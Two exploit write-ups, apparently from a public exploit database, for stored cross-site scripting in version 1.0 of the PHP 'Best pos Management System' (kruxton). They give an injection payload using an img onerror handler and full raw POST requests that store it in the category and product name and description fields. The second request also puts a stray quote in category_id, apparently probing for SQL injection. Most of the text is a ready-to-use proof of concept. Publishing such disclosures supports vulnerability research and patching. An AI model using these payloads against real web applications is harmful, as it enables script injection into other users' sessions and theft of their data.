# Exploit Title: Stored Cross Site Scripting on Best pos Management System
# Google Dork: NA
# Date: 14/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA
# Description
Payload : "><img src=x onerror=prompt(document.domain);>
# POC :
1- Head to Add Category on
"http://localhost/kruxton/index.php?page=add-category"
2- On Name Parameter add our Payload "><img src=x
onerror=prompt(document.domain);>
3- After Adding This Category XSS will run
```
POST /kruxton/ajax.php?action=save_category HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------7128987773293048653857517
Content-Length: 442
Origin: http://localhost
Connection: close
Referer: http://localhost/kruxton/index.php?page=add-category
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="id"
-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="name"
XSSPOC"><img src=x onerror=prompt(document.domain);>
-----------------------------7128987773293048653857517
Content-Disposition: form-data; name="description"
This is POC
-----------------------------7128987773293048653857517--
```
--------------------------------------
# Exploit Title: Stored Cross Site Scripting on Best pos Management System
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA
Payload : "><img src=x onerror=prompt(document.domain);>
# POC :
1- Head to Add Category on
"http://localhost/kruxton/ajax.php?action=save_product"
2- On Name Parameter add our Payload "><img src=x
onerror=prompt(document.domain);>
on description <img src=x onerror=prompt(2);>
3- After Adding This Category XSS will run
```
POST /kruxton/ajax.php?action=save_product HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------11015616619250686693182759357
Content-Length: 830
Origin: http://localhost
Connection: close
Referer: http://localhost/kruxton/index.php?page=add-product
Cookie: PHPSESSID=<COOKIE>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="id"
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="category_id"
3'
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="name"
XSSPOC2"><img src=x onerror=prompt(document.domain);>
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="description"
XSSPOC2"><img src=x onerror=prompt(2);>
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="price"
1122
-----------------------------11015616619250686693182759357
Content-Disposition: form-data; name="status"
1
-----------------------------11015616619250686693182759357--
```
